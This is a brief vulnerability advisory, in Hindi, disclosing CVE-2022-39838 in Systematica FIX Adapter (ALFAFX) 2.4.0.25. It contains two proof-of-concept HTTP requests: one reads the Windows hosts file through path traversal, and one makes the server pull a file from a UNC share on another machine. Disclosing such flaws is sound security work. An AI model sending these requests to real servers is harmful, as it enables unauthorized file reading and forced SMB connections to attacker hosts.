
CVE-2022-39838 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो HTTP अनुरोधों के माध्यम से Systematica FIX Adapter (ALFAFX) 2.4.0.25 में रिमोट फ़ाइल इंक्लूज़न और एब्सोल्यूट पाथ ट्रैवर्सल का प्रदर्शन करता है।
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 एक UNC शेयर पथनाम के माध्यम से दूरस्थ फ़ाइल समावेशन की अनुमति देता है, और स्थानीय पथनामों तक पूर्ण पथ ट्रैवर्सल की भी अनुमति देता है।
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
गलत अभिगम नियंत्रण
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
दूरस्थ
सत्य
दूरस्थ उपयोगकर्ता पूर्ण पथ के माध्यम से OS में किसी भी फ़ाइल तक पहुंच प्राप्त कर सकता है। इसके अलावा, दूरस्थ उपयोगकर्ता कमजोर सर्वर को smb के माध्यम से किसी अन्य मशीन से फ़ाइल का अनुरोध करने के लिए मजबूर कर सकता है।
Ivashchenko Sergey (Jet Infosystems, jet.su)